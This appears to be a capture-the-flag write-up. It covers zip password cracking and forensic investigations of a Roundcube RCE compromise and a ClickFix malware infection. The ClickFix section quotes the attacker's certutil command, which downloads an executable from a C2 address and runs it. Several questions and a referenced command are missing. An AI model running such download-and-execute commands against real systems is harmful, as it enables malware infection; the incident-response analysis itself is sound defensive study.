We are given a password-protected .zip archive, which we will be cracking with John.
SH
$ zip2john 'Secret.zip' > 'zip.hash'&& john --wordlist='/usr/share/wordlists/rockyou.txt''zip.hash'Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ryancolin1 (Secret.zip/unknown.png)1g 0:00:00:00 DONE (2025-11-12 17:41) 3.846g/s 15879Kp/s 15879Kc/s 15879KC/s s-dub30..rubyredcamry
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Click to expand and view more
The password is ryancolin1, extracting the archive gives us unknown.png file, but the header has been modified.
We can see a strange artifact at the top left corner of the image.
A slight editing of the image gives us the flag.
::: info
Note
The intended method is to view the blue bit plane of the image.
Flag: PIS{h4ll0w33n_1s_f4n!!!}
Foothold
Flag format: PIS{CVE_HOST:PORT_/path/to/persistence}
This is a mailserver we need to check for a security breach.
Checking /var/mail/root gives us an email that has been sent to the Forensics Team. Which reads:
PLAINTEXT
From www-data@forensicLab.com Mon Nov 3 13:34:51 2025
Return-Path: <www-data@forensicLab.com>
X-Original-To: root
Delivered-To: root@forensicLab.com
Received: by mailserver.localdomain (Postfix, from userid 33)
id 10F90121456; Mon, 3 Nov 2025 13:34:50 +0000 (UTC)
To: root@forensicLab.com
From: www-data@forensicLab.com
Auto-Submitted: auto-generated
Subject: *** SECURITY information for mailserver ***
Message-Id: <20251103133451.10F90121456@mailserver.localdomain>
Date: Mon, 3 Nov 2025 13:34:50 +0000 (UTC)
mailserver : Nov 3 13:34:50 : www-data : user NOT in sudoers ; TTY=pts/1 ; PWD=/var/www/html/roundcube ; USER=root ; COMMAND=/usr/bin/crontab -
Click to expand and view more
This tells us that the user www-data, exploited the Roundcube mail server, then tried to setup a crontab.
A quick look inside (/var/www/html/) uses Roundcube 1.6.10. A quick look up on the internet gives us this Remote Code Execution CVE.
PLAINTEXT
CVE-2025-49113 – Roundcube 1.6.10 Authenticated Remote Code Execution
⚠️ Disclaimer
This repository is intended strictly for educational and research purposes.
All demonstrations were performed in a controlled lab environment.
Unauthorized testing or exploitation of systems without explicit permission is illegal and unethical. The author is not responsible for any misuse of this information.
📌 What Is Roundcube?
Roundcube is a widely used, browser-based IMAP email client written in PHP. It provides a user-friendly interface for webmail access and is commonly deployed by hosting providers, academic institutions, and internal enterprise mail servers.
🚨 About the Vulnerability
CVE-2025-49113 is a vulnerability affecting Roundcube version 1.6.10 that allows an authenticated user to achieve remote code execution (RCE) by submitting a crafted command through the webmail interface.
Successful exploitation requires valid user credentials. Once exploited, it grants system-level command execution based on the web server's context.
CVE ID: CVE-2025-49113
Affected Application: Roundcube 1.6.10
Vulnerability Type: Authenticated Remote Code Execution
Exploit Type: Reverse Shell via PHP Payload
Exploit Availability: Public GitHub PoC
This command opens up port 4444 at 192.168.75.137, which gives us the initial access address.
Going back, we also knew that user www-data also created a crontab, which on Linux is most likely stored in /var/spool/cron/crontabs/
Inside is a crontab that reads.
CR
# DO NOT EDIT THIS FILE - edit the master and reinstall.# (- installed on Mon Nov 3 13:35:29 2025)# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)*/5****/tmp/beacon001 >/dev/null 2>&1
Click to expand and view more
This crontab executes the binary beacon001 every 5 minutes.
Uploading beacon001 on VirusTotal
, tells us that this file is malicious.
Combine all the elements together to get the flag.
After that we can type in our password in the PasteBinlink to get the flag.
Note
If you can’t access PasteBin, you can use this frontend
to access the flag.
Flag: PIS{fr0m_f4n_n3r0_w1th_l0v3}
FixFixFix
Dear IR Team,
A client reported system issues after encountering an online verification page during normal web browsing. Following interaction with this interface, their workstation showed signs of compromise.
We detected suspicious activities including unusual process executions, external network connections, and system configuration changes. Evidence suggests malware installation with persistence mechanisms and credential harvesting capabilities.
The device is isolated. Please investigate.
We are given a Raw Disk Image, a Memory Dump and a Packet Capture.
Question 1
What initial access technique was used to lure the user to deploy the malware?
Looking from the thumbnail image, we can see that this site is mimicking Google’s CAPTCHA to trick the user into executing malicious code.
According to Mitre ATT&CK:
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is “ClickFix,” in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.
Answer: ClickFix.
Question 2
What is the exact date and time of initial compromise?
We know that the user executed a command by launching a Terminal, then pasting the malicious Powersh code and executed it. Which we can extract the time from the RunMRU key from the NTUSER.DAT registry.
RunMru
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
LastWrite Time 2025-11-09 01:02:22Z
MRUList = a
a cmd.exe /c certutil -urlcache -split -f "http://192.168.20.3/cailonmemay.exe" "%TEMP%\svhost.exe" && "%TEMP%\svhost.exe" && timeout 3\1
Click to expand and view more
We can see the Last Write Time was at 2025-11-09 01:02:22.
Answer: 2025-11-09 01:02:22.
Question 3
What is the MITRE ATT&CK ID of the 1st stage downloader?
According to Microsoft.
This malware is used to download another malware
A quick look up gives us this information from MITRE ATT&CK:
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
This is found under ID T1105.
Answer: T1105.
Question 4
When was the malware first executed on the system?
Windows Defenders detected a Registry Change on HKCU@S-1-5-21-3558265190-190559637-539419846-1000\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\SHELL
What is the MITRE ATT&CK ID of the persistence technique?
A quick lookup gives us the Winlogon Helper DLLPersistence Technique. According to MITRE ATT&CK:
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.
This technique falls under ID: T1547.004.
Answer: T1547.004.
Question 9
What IP address and port was used for C2 communications?
Looking at the [VirusTotal analysis] again:
The Malware makes HTTP Requests only to 192.168.20.3:8888 to communicate.
Sliver uses file extensions to determine what type of request is being made
.woff – Used for stagers
.html – Key exchange messages
.js – Long poll messages
.php – Session messages
.png – Close session messages
Inspecting our Packet Capture again, this was the first C2 command:
This C2 command was sent at:
Answer: 2025-11-09 01:02:30.
Question 11
How many different commands did the attacker execute?
$ pyinstxtractor.py 'concacbamay.exe'[+] Processing concacbamay.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 3.13
[+] Length of package: 16036748 bytes
[+] Found 115 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: pyi_rth_cryptography_openssl.pyc
[+] Possible entry point: pyi_rth_setuptools.pyc
[+] Possible entry point: pyi_rth_pkgres.pyc
[+] Possible entry point: mal.pyc
[+] Found 787 files in PYZ archive
[!] Error: Failed to decompress PYZ.pyz_extracted/jaraco.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_distutils/compilers.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_distutils/compilers/C.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_vendor.pyc, probably encrypted. Extracting as is.
[!] Error: Failed to decompress PYZ.pyz_extracted/setuptools/_vendor/jaraco.pyc, probably encrypted. Extracting as is.
[+] Successfully extracted pyinstaller archive: concacbamay.exe
You can now use a python decompiler on the pyc files within the extracted directory.
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. Please attribute the source, use non-commercially, and maintain the same license.
